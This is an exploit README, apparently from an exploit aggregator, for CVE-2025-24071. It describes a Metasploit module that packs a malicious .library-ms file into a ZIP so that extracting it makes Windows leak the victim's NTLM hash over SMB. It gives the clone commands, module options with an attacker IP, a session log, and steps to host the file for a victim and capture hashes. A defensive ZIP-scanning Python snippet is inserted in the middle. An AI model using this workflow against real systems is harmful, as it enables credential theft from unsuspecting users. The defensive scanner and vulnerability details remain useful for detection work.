## https://sploitus.com/exploit?id=7469394D-CC6C-5742-9B7E-A878B0BABF52
# Blackash-CVE-2025-24071

# CVE-2025-24071: NTLM Hash Leak via .library-ms File, Metasploit Module 🚨

# Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

# Metrics 

- CNA: Microsoft Corporation
- Base Score: 6.5 MEDIUM 🟠
- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`

# Overview

The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted `.library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any further user interaction beyond the extraction itself (the `UI:R` in the vector above).

This Metasploit module:

1. Generates a malicious `.library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.
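
A defender-side check for the delivery path described above, as an added example that is not part of this module or repository: it lists `.library-ms` members inside a ZIP and reports any remote targets they name, so a mail or download gateway can hold the archive before anyone extracts it. It assumes the remote server is referenced as a UNC path (`\\host\share`); the function names are this example's own, and the sample archive holds constructed placeholder text, not a real library file.

```python
import io
import re
import zipfile

# UNC path such as \\host\share; the host is what Explorer would contact over SMB.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\([^\\<>"\s]+)')


def decode(raw: bytes) -> str:
    """Decode member bytes: honour a UTF-16 BOM, otherwise treat as UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")


def scan_zip(data: bytes, max_member_size: int = 1 << 20) -> list[dict]:
    """Return one finding per .library-ms member, with the UNC targets it names."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # Extension match is case-insensitive, as on Windows.
            if not info.filename.lower().endswith(".library-ms"):
                continue
            if info.file_size > max_member_size:  # do not inflate huge members
                findings.append({"member": info.filename, "targets": [],
                                 "note": "oversized, not inspected"})
                continue
            text = decode(zf.read(info))
            targets = sorted({f"\\\\{h}\\{s}" for h, s in UNC_RE.findall(text)})
            findings.append({"member": info.filename, "targets": targets,
                             "note": "remote SMB reference" if targets else "no UNC path"})
    return findings


def build_sample(member: str, body: bytes) -> bytes:
    """Constructed in-memory test archive; body is placeholder text only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, body)
        zf.writestr("readme.txt", b"hello")
    return buf.getvalue()


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address (RFC 5737), used as a constructed value.
    sample = build_sample("Docs/Report.LIBRARY-MS", b"<x>\\\\192.0.2.10\\shared</x>")
    for finding in scan_zip(sample):
        print(finding)
```

A `.library-ms` member with no UNC path is still reported, because such files are rare in archives received from outside and are worth a manual look.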

```
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILENAME exploit.zip
FILENAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
```

# Installation:

1. Clone the repository:

```
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd Blackash-CVE-2025-24071
```

# Usage:

1. Load the module:

```
use auxiliary/server/ntlm_hash_leak
```

2. Set the required options:

```
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
```

3. Run the module:

```
run
```

4. The module will generate a malicious ZIP file (`exploit.zip`). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:

```
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run
```

# Disclaimer ⚠️

For educational and research purposes only. Use only against systems you own or have permission to test.